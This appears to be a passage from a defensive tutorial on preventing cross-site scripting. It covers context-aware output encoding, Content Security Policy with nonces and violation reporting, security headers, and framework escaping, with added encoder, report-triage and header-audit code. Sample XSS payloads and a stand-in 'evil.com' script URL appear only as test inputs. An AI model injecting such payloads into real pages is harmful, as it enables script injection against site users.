// 🎯 Example usage
var userInput = '<script>alert("XSS")</script>';
// The encoded string renders as literal text; the tag is never parsed.
// (textContent is the simpler choice when no markup is needed at all.)
document.getElementById('output').innerHTML = encodeHTML(userInput);
// Output: &lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;
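Added implementation example (mine, not the post's code): an allow-list version of the encoders above that covers all five contexts of the table, including the URL and CSS encoders the functions above leave out, plus a tiny renderer in which each placeholder declares its output context so the right encoder is chosen mechanically. The {{context:key}} placeholder syntax is an assumption made for this demo, not a real template engine, and the sample page is constructed.

```javascript
// Added example (not the original post's code): allow-list, context-aware output
// encoding. Everything outside [A-Za-z0-9] is encoded in the form each context
// understands, so there is no "did we remember this character" gap of the kind a
// character blocklist leaves. The {{ctx:key}} placeholder syntax of render() is
// an assumption made for this demonstration, not a real templating library.

const ALNUM = /^[A-Za-z0-9]$/;
const hexOf = (ch) => ch.codePointAt(0).toString(16).toUpperCase();

// Walk by code point so astral characters (emoji) get one escape, not two.
function encodeEach(input, encodeChar) {
  let out = '';
  for (const ch of String(input)) out += ALNUM.test(ch) ? ch : encodeChar(ch);
  return out;
}

// HTML body text and quoted attribute values: numeric entity per code point.
function encodeHtml(s) {
  return encodeEach(s, (ch) => `&#x${hexOf(ch)};`);
}

// Inside a JavaScript string literal: \uXXXX per UTF-16 unit, which can close
// neither the string, nor the <script> element, nor a comment.
function encodeJs(s) {
  let out = '';
  for (const ch of String(s)) {
    if (ALNUM.test(ch)) { out += ch; continue; }
    for (let i = 0; i < ch.length; i++) out += '\\u' + ch.charCodeAt(i).toString(16).padStart(4, '0');
  }
  return out;
}

// Query-string parameter value: encodeURIComponent plus the characters it leaves alone.
function encodeUrlParam(s) {
  return encodeURIComponent(String(s)).replace(/[!'()*]/g, (c) => '%' + c.charCodeAt(0).toString(16).toUpperCase());
}

// Inside a CSS string: hex escape with a terminating space so a following hex digit is not absorbed.
function encodeCss(s) {
  return encodeEach(s, (ch) => `\\${hexOf(ch)} `);
}

const ENCODERS = { html: encodeHtml, attr: encodeHtml, js: encodeJs, url: encodeUrlParam, css: encodeCss };

// Render a template whose placeholders declare their context, e.g. {{js:name}}.
// The context picks the encoder; an unknown context or missing value is an error, not a silent pass-through.
function render(template, values) {
  return template.replace(/\{\{(\w+):(\w+)\}\}/g, (_, ctx, key) => {
    if (!ENCODERS[ctx]) throw new Error(`unknown output context "${ctx}"`);
    if (!(key in values)) throw new Error(`missing value for "${key}"`);
    return ENCODERS[ctx](values[key]);
  });
}

// Constructed page: the same value lands in all five contexts of the table above.
const PAGE = [
  '<p>Hello, {{html:name}}</p>',
  '<input value="{{attr:name}}">',
  '<script>var who = "{{js:name}}";</script>',
  '<a href="/search?q={{url:name}}">search</a>',
  '<style>.tag::after { content: "{{css:name}}"; }</style>',
].join('\n');

function demo() {
  return render(PAGE, { name: '<img src=x onerror=alert(1)>' });
}

console.log(demo());
```

The allow-list approach costs a little readability in the output (a space in HTML becomes `&#x20;`) and buys certainty: whatever new character a filter-bypass list discovers tomorrow is already encoded today. The one thing no encoder fixes is a value placed in a context with no safe encoding, such as an unquoted attribute or a `javascript:` URL, which is why `render()` refuses contexts it does not know.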
# 🛡️ Python Encoding Examples
import html
import json
import urllib.parse


def secure_output_rendering(user_input):
    # HTML context
    html_safe = html.escape(user_input)
    # Output: &lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;

    # JavaScript context: json.dumps() yields a quoted, escaped string literal;
    # escaping "<" as well stops a "</script>" inside the data from closing an inline <script> block
    js_safe = json.dumps(user_input).replace('<', '\\u003c')
    # Output: "\u003cscript>alert(\"XSS\")\u003c/script>"

    # URL context: safe='' so "/" is encoded too (quote() leaves it alone by default)
    url_safe = urllib.parse.quote(user_input, safe='')
    # Output: %3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E

    return {
        'html': html_safe,
        'js': js_safe,
        'url': url_safe
    }
<!-- 🛡️ PHP Encoding Examples -->
<?php
// HTML context
$safe_html = htmlspecialchars($user_input, ENT_QUOTES | ENT_HTML5, 'UTF-8');
// Converts: <script>alert("XSS")</script>
// To: &lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;

// JavaScript context (the JSON_HEX_* flags escape <, > and & so the literal cannot close a <script> block)
$safe_js = json_encode($user_input, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS);
// Converts to: "\u003Cscript\u003Ealert(\"XSS\")\u003C\/script\u003E"

// URL context
$safe_url = urlencode($user_input);
// Converts to: %3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E

// Attribute context (double_encode=false leaves entities already in the input untouched;
// keep the default of true unless the input is known to be entity-encoded already)
$safe_attr = htmlspecialchars($user_input, ENT_QUOTES | ENT_HTML5, 'UTF-8', false);
?>
2️⃣ 🛡️ CONTENT SECURITY POLICY (CSP)
🎯 WHAT IS CSP?
A security standard that helps prevent XSS by whitelisting trusted sources of content.
CSP HEADER SYNTAX:
Content-Security-Policy: directive1 value1; directive2 value2;
RECOMMENDED CSP POLICY:
Content-Security-Policy:
  default-src 'self';
  script-src 'self' https://trusted-cdn.com;
  style-src 'self' 'unsafe-inline';
  img-src 'self' https://*.example.com;
  font-src 'self' https://fonts.googleapis.com;
  connect-src 'self' https://api.example.com;
  frame-src 'none';
  object-src 'none';
  base-uri 'self';
  form-action 'self';
  frame-ancestors 'none';
  block-all-mixed-content;
  upgrade-insecure-requests;

CSP Directives Explained:
SECURITY DIRECTIVES:
├── default-src 'self'
│   └── Default fallback for all resource types
│
├── script-src 'self' 'nonce-abc123'
│   ├── Controls JavaScript sources
│   └── Use nonces for inline scripts
│
├── style-src 'self' 'unsafe-inline'
│   ├── Controls CSS sources
│   └── 'unsafe-inline' often needed for CSS
│
├── img-src 'self' data: https://*.example.com
│   └── Controls image sources
│
├── connect-src 'self' https://api.example.com
│   └── Controls fetch/XMLHttpRequest/AJAX calls
│
├── font-src 'self' https://fonts.gstatic.com
│   └── Controls font sources
│
├── frame-src 'none'
│   └── Blocks iframes (prevents clickjacking)
│
├── object-src 'none'
│   └── Blocks Flash/Java applets
│
├── base-uri 'self'
│   └── Prevents base tag hijacking
│
├── form-action 'self'
│   └── Controls form submission targets
│
└── frame-ancestors 'none'
    └── Prevents site from being framed (the CSP replacement for X-Frame-Options)

Implementing CSP with Nonces:
<!-- 🎯 Server generates a unique nonce on each request -->
<?php
$nonce = base64_encode(random_bytes(16));
// The style nonce below only means something if style-src carries it too
header("Content-Security-Policy: script-src 'self' 'nonce-$nonce'; style-src 'self' 'nonce-$nonce'");
?>
<!-- 🛡️ Only scripts carrying the current nonce execute -->
<script nonce="<?= $nonce ?>">
  // This script will execute
  console.log('Trusted script');
</script>
<script>
  // This script will NOT execute
  alert('Blocked by CSP!');
</script>
<!-- 🎯 Inline styles with nonce -->
<style nonce="<?= $nonce ?>">
  body { color: #333; }
</style>
CSP Reporting:
MONITORING CSP VIOLATIONS:
Content-Security-Policy:
  default-src 'self';
  report-uri /csp-violation-report-endpoint;
  report-to csp-endpoint;
Content-Security-Policy-Report-Only:
  default-src 'self';
  script-src 'self';
  report-uri /csp-report;
(report-to names an endpoint group, so the response also needs a Reporting-Endpoints header that defines it, e.g. Reporting-Endpoints: csp-endpoint="https://example.com/csp-violation-report-endpoint"; report-uri is the older mechanism and is still the most widely delivered.)
🎯 VIOLATION REPORT EXAMPLE:
{
  "csp-report": {
    "document-uri": "https://example.com/page",
    "referrer": "https://google.com",
    "violated-directive": "script-src",
    "effective-directive": "script-src",
    "original-policy": "script-src 'self'",
    "blocked-uri": "https://evil.com/xss.js",
    "line-number": 25,
    "column-number": 10,
    "source-file": "https://example.com/page",
    "status-code": 200,
    "script-sample": "alert(1)"
  }
}

3️⃣ SECURITY HEADERS
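Before the header list, an added example (not from the original post) for the reporting endpoint named in the CSP section above. It accepts both report shapes browsers send (the legacy {"csp-report": …} body delivered via report-uri and the Reporting API {type: "csp-violation", body: …} body delivered via report-to), triages each violation and collapses repeats so a burst of identical reports is one finding. The trusted-origin set and the sample batch are constructed; the first sample is a copy of the report shown above.

```javascript
// Added example (not from the original post): a receiver for the report-uri /
// report-to endpoints named above. It accepts both the legacy {"csp-report": ...}
// body and the Reporting API {type: "csp-violation", body: ...} body, triages each
// violation, and aggregates repeats so a burst of identical reports is one finding.
// TRUSTED_ORIGINS and the sample reports are constructed for the demonstration
// (the first is a copy of the report shown above).

const TRUSTED_ORIGINS = new Set(['https://example.com', 'https://trusted-cdn.com']);
const INLINE_TOKENS = new Set(['inline', 'eval', 'wasm-eval', '']);
const EXTENSION_SCHEME = /^(chrome|moz|safari|ms-browser)-extension:/i;
const SEVERITY_RANK = { high: 0, medium: 1, low: 2, info: 3 };

function normalizeReport(raw) {
  const obj = typeof raw === 'string' ? JSON.parse(raw) : raw;
  if (obj['csp-report']) {                         // legacy report-uri format
    const r = obj['csp-report'];
    return {
      documentUrl: r['document-uri'] || '',
      blockedUrl: r['blocked-uri'] || '',
      directive: r['effective-directive'] || r['violated-directive'] || '',
      sourceFile: r['source-file'] || '',
      line: r['line-number'] || 0,
      sample: r['script-sample'] || '',
    };
  }
  if (obj.type === 'csp-violation' && obj.body) {  // Reporting API format
    const b = obj.body;
    return {
      documentUrl: b.documentURL || '',
      blockedUrl: b.blockedURL || '',
      directive: b.effectiveDirective || '',
      sourceFile: b.sourceFile || '',
      line: b.lineNumber || 0,
      sample: b.sample || '',
    };
  }
  throw new Error('unrecognised CSP report shape');
}

// Separate injection signals from the noise every public CSP endpoint receives.
function triage(r) {
  if (EXTENSION_SCHEME.test(r.blockedUrl)) return { verdict: 'extension-noise', severity: 'info' };
  if (!/^script-src/.test(r.directive)) return { verdict: 'policy-gap', severity: 'low' };
  if (INLINE_TOKENS.has(r.blockedUrl)) return { verdict: 'inline-script', severity: 'high' };
  let origin;
  try { origin = new URL(r.blockedUrl).origin; } catch (e) { return { verdict: 'unparseable', severity: 'medium' }; }
  return TRUSTED_ORIGINS.has(origin)
    ? { verdict: 'policy-gap', severity: 'low' }          // our own host; the policy is just too tight
    : { verdict: 'untrusted-script', severity: 'high' };  // script from somewhere we never allowed
}

function aggregate(rawReports) {
  const buckets = new Map();
  for (const raw of rawReports) {
    const r = normalizeReport(raw);
    const key = `${r.directive}|${r.blockedUrl}|${r.sourceFile}:${r.line}`;
    const b = buckets.get(key) || { key, count: 0, ...triage(r), documentUrl: r.documentUrl, sample: r.sample };
    b.count += 1;
    buckets.set(key, b);
  }
  return [...buckets.values()].sort((a, b) => SEVERITY_RANK[a.severity] - SEVERITY_RANK[b.severity]);
}

// Constructed sample batch.
const PAGE_REPORT = JSON.stringify({ 'csp-report': {
  'document-uri': 'https://example.com/page', 'referrer': 'https://google.com',
  'violated-directive': 'script-src', 'effective-directive': 'script-src',
  'original-policy': "script-src 'self'", 'blocked-uri': 'https://evil.com/xss.js',
  'line-number': 25, 'column-number': 10, 'source-file': 'https://example.com/page',
  'status-code': 200, 'script-sample': 'alert(1)' } });

const SAMPLE_BATCH = [
  PAGE_REPORT,
  PAGE_REPORT,                                                   // same violation reported twice
  { 'csp-report': { 'document-uri': 'https://example.com/page', 'effective-directive': 'script-src-elem',
                    'blocked-uri': 'chrome-extension://abcdefghijklmnop/content.js' } },
  { 'csp-report': { 'document-uri': 'https://example.com/page', 'effective-directive': 'style-src-elem',
                    'blocked-uri': 'inline', 'source-file': 'https://example.com/page', 'line-number': 40 } },
  { type: 'csp-violation', age: 12, url: 'https://example.com/profile',
    body: { documentURL: 'https://example.com/profile', blockedURL: 'inline', effectiveDirective: 'script-src-elem',
            sample: 'alert(1)', disposition: 'enforce' } },
];

console.log(JSON.stringify(aggregate(SAMPLE_BATCH), null, 2));
```

The two "high" buckets are what the endpoint exists for: a script loaded from a host the policy never named, and an inline script on a page that only allows nonced ones. Browser-extension noise and style violations still get logged, just not paged on. The endpoint itself should be unauthenticated, accept only POST, cap body size and never reflect the report content into any page.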
🎯 DEFENSE-IN-DEPTH WITH HTTP HEADERS:
1️⃣ X-Frame-Options: DENY
├── Prevents clickjacking
└── Options: DENY, SAMEORIGIN, ALLOW-FROM uri
2️⃣ X-Content-Type-Options: nosniff
├── Prevents MIME type sniffing
└── Forces browser to respect declared content types
3️⃣ X-XSS-Protection: 0
├── Disables browser's built-in XSS filter
└── Modern approach: rely on CSP instead
4️⃣ Referrer-Policy: strict-origin-when-cross-origin
└── Controls referrer information in requests
5️⃣ Strict-Transport-Security (HSTS): max-age=31536000; includeSubDomains
└── Forces HTTPS connections
6️⃣ Feature-Policy: camera 'none'; microphone 'none'
└── Controls browser feature usage (superseded by Permissions-Policy, which the configurations below use)

Complete Security Headers Configuration:
# 🛡️ Nginx Configuration
server {
    add_header X-Frame-Options "DENY" always;
    add_header X-Content-Type-Options "nosniff" always;
    add_header X-XSS-Protection "0" always;
    add_header Referrer-Policy "strict-origin-when-cross-origin" always;
    add_header Strict-Transport-Security "max-age=31536000; includeSubDomains" always;
    add_header Content-Security-Policy "default-src 'self'; script-src 'self' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; font-src 'self'; connect-src 'self'; frame-src 'none'; object-src 'none'; base-uri 'self'; form-action 'self'; frame-ancestors 'none';" always;
    add_header Permissions-Policy "camera=(), microphone=(), geolocation=()" always;
}
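Added example (not from the original post): an audit function that checks a set of response headers against the list above. It is run on the headers the Nginx block emits, copied here as constructed input, and on a hardened copy where script-src uses a nonce instead of 'unsafe-inline'; 'nonce-PLACEHOLDER' stands in for the per-request value a real server would generate.

```javascript
// Added example (not from the original post): an audit of a response's security
// headers against the list above, run on the exact headers the Nginx block emits
// (copied here as constructed input) and on a hardened variant. The nonce value
// in the hardened policy is a placeholder standing in for a per-request nonce.

const ONE_YEAR = 31536000;

// "directive value value; ..." → { directive: [values] }
const parseCsp = (csp) => Object.fromEntries(
  csp.split(';').map((p) => p.trim().split(/\s+/)).filter((t) => t[0]).map((t) => [t[0].toLowerCase(), t.slice(1)]));

function auditHeaders(headers) {
  const h = Object.fromEntries(Object.entries(headers).map(([k, v]) => [k.toLowerCase(), String(v)]));
  const findings = [];
  const fail = (header, msg) => findings.push({ header, msg });

  if ((h['x-content-type-options'] || '').trim().toLowerCase() !== 'nosniff')
    fail('X-Content-Type-Options', 'missing or not "nosniff"');

  // The legacy XSS auditor caused its own problems; the advice above is 0 (or omit the header).
  if (h['x-xss-protection'] !== undefined && !/^\s*0\s*$/.test(h['x-xss-protection']))
    fail('X-XSS-Protection', 'legacy filter enabled; set it to 0 and rely on CSP');

  const maxAge = Number(((h['strict-transport-security'] || '').match(/max-age=(\d+)/i) || [])[1]);
  if (!(maxAge >= ONE_YEAR)) fail('Strict-Transport-Security', 'missing or max-age below one year');

  if (!h['referrer-policy']) fail('Referrer-Policy', 'missing');

  const policy = h['content-security-policy'] ? parseCsp(h['content-security-policy']) : null;
  if (!policy) {
    fail('Content-Security-Policy', 'missing');
  } else {
    const script = policy['script-src'] || policy['default-src'] || [];
    const nonceOrHash = script.some((v) => /^'(nonce-|sha(256|384|512)-)/.test(v));
    if (script.includes("'unsafe-inline'") && !nonceOrHash)
      fail('Content-Security-Policy', "script-src allows 'unsafe-inline': injected inline scripts still run");
    if (script.includes("'unsafe-eval'")) fail('Content-Security-Policy', "script-src allows 'unsafe-eval'");
    if (script.some((v) => v === '*' || /^(https?|data|blob):$/.test(v)))
      fail('Content-Security-Policy', 'script-src allows a wildcard or whole-scheme source');
    if (!(policy['object-src'] || policy['default-src'] || []).includes("'none'"))
      fail('Content-Security-Policy', "object-src is not 'none'");
    if (!policy['base-uri']) fail('Content-Security-Policy', 'base-uri not set');
  }
  if (!(policy && policy['frame-ancestors']) && !h['x-frame-options'])
    fail('framing', 'neither frame-ancestors nor X-Frame-Options is set');
  return findings;
}

// Constructed input: the headers produced by the Nginx configuration above.
const NGINX_HEADERS = {
  'X-Frame-Options': 'DENY',
  'X-Content-Type-Options': 'nosniff',
  'X-XSS-Protection': '0',
  'Referrer-Policy': 'strict-origin-when-cross-origin',
  'Strict-Transport-Security': 'max-age=31536000; includeSubDomains',
  'Content-Security-Policy': "default-src 'self'; script-src 'self' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; font-src 'self'; connect-src 'self'; frame-src 'none'; object-src 'none'; base-uri 'self'; form-action 'self'; frame-ancestors 'none';",
  'Permissions-Policy': 'camera=(), microphone=(), geolocation=()',
};

// Same headers with script-src moved to a per-request nonce ('nonce-PLACEHOLDER' stands in for the real value).
const HARDENED_HEADERS = {
  ...NGINX_HEADERS,
  'Content-Security-Policy': NGINX_HEADERS['Content-Security-Policy']
    .replace("script-src 'self' 'unsafe-inline'", "script-src 'self' 'nonce-PLACEHOLDER'"),
};

console.log('nginx   :', auditHeaders(NGINX_HEADERS));
console.log('hardened:', auditHeaders(HARDENED_HEADERS));
```

Run against the Nginx headers the audit returns exactly one finding: script-src 'unsafe-inline'. That is worth dwelling on, because a configuration that sets every header on the list can still leave the XSS door open; the policy is only as strong as its script-src, and 'unsafe-inline' there means an injected `<script>` or event handler executes as before. Wire the audit into a CI check on a staging response and the regression is caught before it ships.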
# 🛡️ Apache .htaccess Configuration
<IfModule mod_headers.c>
    Header set X-Frame-Options "DENY"
    Header set X-Content-Type-Options "nosniff"
    Header set X-XSS-Protection "0"
    Header set Referrer-Policy "strict-origin-when-cross-origin"
    Header set Strict-Transport-Security "max-age=31536000; includeSubDomains"
    Header set Content-Security-Policy "default-src 'self'; script-src 'self' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; font-src 'self'; connect-src 'self'; frame-src 'none'; object-src 'none'; base-uri 'self'; form-action 'self'; frame-ancestors 'none';"
    Header set Permissions-Policy "camera=(), microphone=(), geolocation=()"
</IfModule>

4️⃣ 🛠️ FRAMEWORK SECURITY FEATURES
React (Auto-escaping by default):
// 🛡️ React automatically escapes content
import DOMPurify from 'dompurify';

function SafeComponent({ userInput }) {
  return (
    <div>
      {/* ✅ Auto-escaped: safe */}
      <p>{userInput}</p>
      {/* ⚠️ Dangerous: only use with trusted content */}
      <div dangerouslySetInnerHTML={{ __html: userInput }} />
      {/* ✅ Sanitize before using dangerouslySetInnerHTML */}
      <div dangerouslySetInnerHTML={{
        __html: DOMPurify.sanitize(userInput)
      }} />
    </div>
  );
}

Angular (Built-in sanitization):
// 🛡️ Angular has built-in security
import { Component, SecurityContext } from '@angular/core';
import { DomSanitizer } from '@angular/platform-browser';

@Component({
  selector: 'app-safe',
  template: `
    <!-- ✅ Auto-sanitized: a plain string bound to [innerHTML] has script and event-handler markup stripped -->
    <div [innerHTML]="userInput"></div>
    <!-- ✅ Explicit sanitization -->
    <div [innerHTML]="getSafeHTML(userInput)"></div>
  `
})
export class SafeComponent {
  userInput = '<img src=x onerror=alert(1)>';

  constructor(private sanitizer: DomSanitizer) {}

  getSafeHTML(input: string): string | null {
    // sanitize() strips dangerous markup; bypassSecurityTrustHtml() would mark it trusted untouched
    return this.sanitizer.sanitize(SecurityContext.HTML, input);
    // ⚠️ Only use bypassSecurityTrustHtml() on content you have already sanitized yourself!
  }
}

Vue.js (Auto-escaping):
<template>
  <!-- ✅ Auto-escaped -->
  <p>{{ userInput }}</p>
  <!-- ⚠️ Dangerous -->
  <div v-html="userInput"></div>
  <!-- ✅ Safe with sanitization -->
  <div v-html="sanitizedInput"></div>
</template>
<script>
import DOMPurify from 'dompurify';
export default {
  data() {
    return {
      // A literal "</script>" inside this string would end the SFC <script> block,
      // so the sample uses an event-handler payload instead
      userInput: '<img src=x onerror=alert("XSS")>'
    };
  },
  computed: {
    sanitizedInput() {
      return DOMPurify.sanitize(this.userInput);
    }
  }
};
</script>

Django (Template auto-escaping):
# 🛡️ Django templates auto-escape by default
from django.shortcuts import render
from django.utils.html import escape
from django.utils.safestring import mark_safe


def safe_view(request):
    user_input = request.GET.get('input', '')
    # ✅ Auto-escaped in templates
    context = {
        'user_input': user_input,                       # auto-escaped by the template engine
        'safe_html': mark_safe('<b>Trusted HTML</b>'),  # ⚠️ mark_safe only on content you control
    }
    return render(request, 'template.html', context)

# In template.html:
# {{ user_input }}      → auto-escaped
# {{ safe_html|safe }}  → rendered as HTML (only if trusted!)